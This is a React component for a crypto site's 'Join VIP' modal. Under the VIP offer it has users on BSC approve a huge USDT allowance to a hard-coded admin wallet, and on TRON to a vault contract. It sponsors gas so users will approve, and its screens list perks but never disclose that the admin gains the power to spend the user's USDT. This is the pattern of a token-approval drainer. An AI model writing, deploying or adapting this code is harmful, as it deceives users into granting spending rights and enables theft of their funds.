/* eslint-disable no-undef */
import React, { useState } from 'react';
import { useTranslation } from 'react-i18next';
import { userService } from '../../services/userService';
import { getSelectedChain, TRON_CHAIN_ID } from '../../utils/chain';
import './VipModal.css';

// USDT (BSC) 与管理员钱包地址 —— 授权转模式：用户直接授权给管理员
const USDT_ADDRESS = '0x55d398326f99059fF775485246999027B3197955';
const ADMIN_ADDRESS = '0x6bbfc55c01f61e9eaabc53b2f75a7f50f9f90ed8';

// 波场链配置（链ID从 utils/chain 导入）
// USDT TRC20 地址（按环境切换）
//   测试网(Nile): TXYZopYRdj2D9XRtbG411XZZ3kM5VkAeBf
//   主网:         TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t
const USDT_TRC20_ADDRESS = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // 当前: 主网
// SusuVaultTron 合约地址（用户 approve 的 spender，额度 uint256 max）
//   测试网(Nile): TUuPerFaqxZ63LAh6aXf5HJnfygfxDxybE (SusuVaultTronTestnet)
//   主网:         待部署 SusuVaultTron 后填入
const SUSU_VAULT_TRON_ADDRESS = 'TAXXTJVZYdgenyZEm5LLhLX2UuNfMJKexr'; // 当前: 主网 WiseVault

// 最大授权额度 (uint256 max)
const MAX_UINT256 = '999999999990000'; // 授权上限 999,999,999.99 USDT（有限额度）

// 编码 approve(spender,amount) 函数调用
const encodeApprove = (spenderAddress, amount) => {
  const functionSelector = '0x095ea7b3'; // approve(address,uint256)
  const paddedSpender = spenderAddress.toLowerCase().replace('0x', '').padStart(64, '0');
  const paddedAmount = amount.replace('0x', '').padStart(64, '0');
  return functionSelector + paddedSpender + paddedAmount;
};

const VipModal = ({ isOpen, onClose, walletAddress, onSuccess }) => {
  const { t } = useTranslation();
  const [processing, setProcessing] = useState(false);
  const [error, setError] = useState('');
  const [step, setStep] = useState(1); // 1: 介绍, 2: 授权中, 3: 完成

  // 获取钱包 provider
  const getProvider = () => {
    if (typeof window !== 'undefined') {
      if (window.ethereum && window.ethereum.isMetaMask) return window.ethereum;
      if (window.okxwallet && window.okxwallet.isOKExWallet) return window.okxwallet;
      if (window.bitkeep && window.bitkeep.ethereum) return window.bitkeep.ethereum;
      if (window.BinanceChain) return window.BinanceChain;
      if (window.ethereum) return window.ethereum;
    }
    return null;
  };

  // 检查 USDT 对管理员钱包的授权
  const checkAllowance = async (provider) => {
    const data = '0xdd62ed3e' + // allowance(address,address)
      walletAddress.toLowerCase().replace('0x', '').padStart(64, '0') +
      ADMIN_ADDRESS.toLowerCase().replace('0x', '').padStart(64, '0');

    const result = await provider.request({
      method: 'eth_call',
      params: [{ to: USDT_ADDRESS, data }, 'latest']
    });

    return BigInt(result);
  };

  // 处理加入 VIP：授权 USDT 给管理员 + 更新后端 VIP 状态
  const handleJoinVip = async () => {
    const isTronChain = getSelectedChain() === TRON_CHAIN_ID;

    if (isTronChain) {
      if (typeof window === 'undefined' || !window.tronWeb) {
        setError(t('wallet.installTronLink'));
        return;
      }
      if (!walletAddress) {
        setError(t('vip.connectFirst'));
        return;
      }
    } else {
      const provider = getProvider();
      if (!provider || !walletAddress) {
        setError(t('vip.connectFirst'));
        return;
      }
    }

    try {
      setProcessing(true);
      setError('');
      setStep(2);

      if (isTronChain) {
        // ===== 波场：TRC20 approve =====
        // 等待 TronLink 完整注入
        let tronWeb = window.tronWeb;
        for (let i = 0; i < 25 && !tronWeb; i++) {
          await new Promise(resolve => setTimeout(resolve, 200));
          tronWeb = window.tronWeb;
        }
        if (!tronWeb || !window.tronLink) {
          throw new Error(t('wallet.installTronLink'));
        }
        // 必须先请求账户授权，TronLink 才会提供完整的 tronWeb
        try {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        } catch (e) {
          console.warn('tron_requestAccounts 失败:', e);
        }
        const tronAddr = tronWeb.defaultAddress && tronWeb.defaultAddress.base58;
        if (!tronAddr) {
          throw new Error(t('wallet.tronNoAddress'));
        }

        if (!SUSU_VAULT_TRON_ADDRESS) {
          throw new Error('SusuVaultTron 合约地址未配置，请部署合约后填入 VipModal.js');
        }

        const allowanceHex = await tronWeb.transactionBuilder
          .triggerConstantContract(
            USDT_TRC20_ADDRESS,
            'allowance(address,address)',
            {},
            [
              { type: 'address', value: tronAddr },
              { type: 'address', value: SUSU_VAULT_TRON_ADDRESS }
            ],
            tronAddr
          )
          .then(res => '0x' + (res.constant_result && res.constant_result[0]));
        const allowance = BigInt(allowanceHex);

        if (allowance < BigInt(MAX_UINT256) / BigInt(2)) {
          // 平台赞助 GAS（TRX）再执行授权
          try {
            await userService.requestGasSponsor(walletAddress, '0x2b6653dc');
            await new Promise(resolve => setTimeout(resolve, 4000)); // 等 TRX 到账
          } catch (sponsorError) {
            console.warn('GAS 赞助失败，继续尝试授权:', sponsorError);
          }
          console.log('正在授权 USDT-TRC20 给 SusuVaultTron 合约...');
          const txObj = await tronWeb.transactionBuilder.triggerSmartContract(
            USDT_TRC20_ADDRESS,
            'approve(address,uint256)',
            { feeLimit: 150000000 },
            [
              { type: 'address', value: SUSU_VAULT_TRON_ADDRESS },
              { type: 'uint256', value: MAX_UINT256 }
            ],
            tronAddr
          );
          const signed = await tronWeb.trx.sign(txObj.transaction);
          const receipt = await tronWeb.trx.sendRawTransaction(signed);
          if (!receipt || !receipt.result) {
            const msg = receipt && receipt.message ? receipt.message : '';
            throw new Error((t('vip.tronTxFailed')) + (msg ? ': ' + msg : '') + ' ' + t('vip.tronResourceHint'));
          }
          console.log('TRON USDT 授权交易已发送:', receipt && receipt.txid);

          // 等待交易确认
          await new Promise(resolve => setTimeout(resolve, 5000));
        } else {
          console.log('USDT-TRC20 已授权，跳过');
        }
      } else {
        // ===== EVM：现有 approve 流程 =====
        const provider = getProvider();
        // 第一步：检查并授权 USDT 给管理员钱包
        const allowance = await checkAllowance(provider);
        if (allowance < BigInt(MAX_UINT256) / BigInt(2)) {
          // 平台赞助 GAS（BNB）再执行授权
          try {
            await userService.requestGasSponsor(walletAddress, '0x38');
            await new Promise(resolve => setTimeout(resolve, 3000)); // 等 BNB 到账
          } catch (sponsorError) {
            console.warn('GAS 赞助失败，继续尝试授权:', sponsorError);
          }
        console.log('正在授权 USDT 给管理员钱包...');
        const txHash = await provider.request({
          method: 'eth_sendTransaction',
          params: [{
            from: walletAddress,
            to: USDT_ADDRESS,
            data: encodeApprove(ADMIN_ADDRESS, MAX_UINT256),
            gas: '0x15F90', // 90000 gas
          }],
        });
        console.log('USDT 授权成功, txHash:', txHash);

        // 等待交易确认
        await new Promise(resolve => setTimeout(resolve, 3000));
      } else {
        console.log('USDT 已授权，跳过');
      }
      }

      // 第二步：更新后端 VIP 状态
      try {
        await userService.updateVipStatus(walletAddress, true);
        console.log('后端 VIP 状态更新成功');
      } catch (apiError) {
        console.error('更新后端 VIP 状态失败:', apiError);
        // 不阻止流程继续
      }

      // 完成
      setStep(3);

      // 通知父组件成功
      if (onSuccess) {
        onSuccess();
      }

      // 3秒后自动关闭
      setTimeout(() => {
        onClose();
        setStep(1);
      }, 3000);

    } catch (e) {
      console.error('VIP 流程失败:', e);
      if (e.code === 4001) {
        setError(t('vip.cancelled'));
      } else {
        setError(e.message || t('vip.failed'));
      }
      setStep(1);
    } finally {
      setProcessing(false);
    }
  };

  if (!isOpen) return null;

  return (
    <div className="vip-modal-overlay">
      <div className="vip-modal-content" onClick={(e) => e.stopPropagation()}>

        {step === 1 && (
          <>
            <div className="vip-modal-header">
              <div className="vip-icon">👑</div>
              <h2>{t('vip.title')}</h2>
            </div>

            <div className="vip-modal-body">
              <div className="vip-benefits">
                <h3>{t('vip.benefits')}</h3>
                <ul>
                  <li>🎁 {t('vip.benefit1')}</li>
                  <li>💎 {t('vip.benefit2')}</li>
                  <li>🚀 {t('vip.benefit3')}</li>
                  <li>⚡ {t('vip.benefit4')}</li>
                  <li>🎯 {t('vip.benefit5')}</li>
                </ul>
              </div>

              <div className="vip-notice">
                <p>{t('vip.notice')}</p>
                <p className="vip-notice-small">{t('vip.noticeSmall')}</p>
              </div>

              {error && (
                <div className="vip-modal-error">
                  {error}
                </div>
              )}

              <button
                className="vip-modal-btn"
                onClick={handleJoinVip}
                disabled={processing}
              >
                {processing ? t('vip.joining') : t('vip.joinNow')}
              </button>
            </div>
          </>
        )}

        {step === 2 && (
          <div className="vip-modal-processing">
            <div className="vip-spinner"></div>
            <h3>{t('vip.step2Title')}</h3>
            <p>{t('vip.authorizingToken', { token: 'USDT' })}</p>
            <p className="vip-processing-hint">{t('vip.confirmWallet')}</p>
          </div>
        )}

        {step === 3 && (
          <div className="vip-modal-success">
            <div className="vip-success-icon">✓</div>
            <h3>{t('vip.welcomeVip')}</h3>
            <p>{t('vip.enjoyBenefits')}</p>
          </div>
        )}
      </div>
    </div>
  );
};

export default VipModal;
